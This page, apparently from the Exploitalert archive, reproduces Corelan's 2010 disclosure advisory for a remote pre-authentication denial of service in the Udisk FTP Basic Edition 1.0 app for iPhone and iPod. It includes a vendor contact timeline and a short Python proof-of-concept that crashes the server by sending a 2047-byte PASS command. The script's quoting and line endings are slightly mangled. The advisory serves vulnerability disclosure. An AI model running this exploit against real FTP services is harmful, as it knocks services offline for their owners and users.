Advertisement






Apple Iphone/Ipod Udisk FTP Basic Edition 1.0 remote pre-auth DoS

CVE Category Price Severity
N/A CWE-20 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2010-01-22
CPE
cpe:cpe:/a:apple:iphone cpe:/a:apple:ipod cpe:/a:udisk cpe:/a:ftp_basic_edition:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010010048

Below is a copy:

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              [email protected] |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory : CORELAN-10-003
Disclosure date : 12th January 2010
Corelan reference : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-udisk-v1-0-remote-dos/
000 : Vulnerability information
�����������

[*] Product : Apple Iphone/Ipod � Udisk FTP basic edition Remote pre-auth DOS vulnerability
[*] Version : 1.0
[*] Vendor : http://6tags.com
[*] URL : http://6tags.com/n/index.php/iphone/udisk/intro
[*] Type of vulnerability : Remote DOS
[*] Risk rating : Medium
[*] Issue fixed in version : <not fixed>
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team

001 : Vendor description of software

From the vendor website:

U.Disk is an easy used application, with stand FTP server build in. With this feature, you can upload or download thousands of files by on click. Just use Copy & Paste to access files. Like your real U-Disk.

002 : Vulnerability details
Remote Denial of Service:

When the application is sent a password (PASS) command with characters of size 2047 the application crashs. 
Remote code execution maybe possible. 

003 : Vendor communication
[*] 3rd January, 2010 : Vendor contacted
[*] 9th January 2010 : Vendor reminded of vulnerability
[*] 12th January 2010 : Public Disclosure

004 : Exploit/PoC


#!/usr/bin/python

print "[+] Apple Iphone/Ipod  Udisk FTP basic edition 0day Remote DOS exploit"

import socket
import sys

def Usage():
print ("Usage: ./udisk.py <serv_ip>n")
print ("Example:./udisk.py 192.168.2.3n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
username = "anonymous"
passwd = "x41? * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] Sending payload.."
sock.send("USER %srn" %username)
sock.send("PASS %srn" %passwd)
sock.send("PWDrn")
sock.close()
print "[+] Server is now DOS'ed ;)"
sys.exit(0);



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum